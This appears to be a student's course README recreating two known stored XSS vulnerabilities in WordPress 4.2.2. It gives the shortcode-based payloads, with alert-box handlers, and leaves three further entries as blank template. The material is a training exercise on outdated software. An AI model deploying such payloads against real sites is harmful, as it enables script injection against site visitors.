RecreatingWordPressExploits

Project 7 - WordPress Pentesting

Time spent: 8 hours spent in total

Objective: Find, analyze, recreate, and document five vulnerabilities affecting an old version of WordPress

Pentesting Report

  1. (Required) Authenticated Stored Cross-Site Scripting (XSS) CVE ID: CVE-2015-5622
  • Summary:

    • Vulnerability types: Cross-Site Scripting (XSS)
    • Tested in version: 4.2.2
    • Fixed in version: 4.2.3
  • GIF Walkthrough: Video Walkthrough

  • Steps to recreate: Create a new post,

    In text editor, type '<a href=/"[caption code=/">]</a><a title=/" onmouseover=alert(/'hacked/') /">link</a>',
    
    create post,
    
    view post and hover on link
    
  • Affected source code:

  1. (Required) Authenticated Shortcode Tags Cross-Site Scripting (XSS) or CVE-2015-5714
  • Summary:

    • Vulnerability types: Cross-Site Scripting (XSS)
    • Tested in version: 4.2.2
    • Fixed in version: 4.3.1
  • GIF Walkthrough: Video Walkthrough

  • Steps to recreate: Create new post,

    In text editor, type 'TEST!!![caption width=/"1/" caption=/'<a href=/"/' /">]</a><a href=/"http:////onMouseOver=/'alert(1)/'/">Click me</a>',
    
    create post,
    
    view post and hover on link
    
  1. (Required) Vulnerability Name or ID
  • Summary:
    • Vulnerability types:
    • Tested in version:
    • Fixed in version:
  • GIF Walkthrough:
  • Steps to recreate:
  • Affected source code:
  1. (Optional) Vulnerability Name or ID
  • Summary:
    • Vulnerability types:
    • Tested in version:
    • Fixed in version:
  • GIF Walkthrough:
  • Steps to recreate:
  • Affected source code:
  1. (Optional) Vulnerability Name or ID
  • Summary:
    • Vulnerability types:
    • Tested in version:
    • Fixed in version:
  • GIF Walkthrough:
  • Steps to recreate:
  • Affected source code:

Assets

List any additional assets, such as scripts or files

Resources

GIFs created with LiceCap.

Notes

Describe any challenges encountered while doing the work

License

Copyright [yyyy] [name of copyright owner]

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.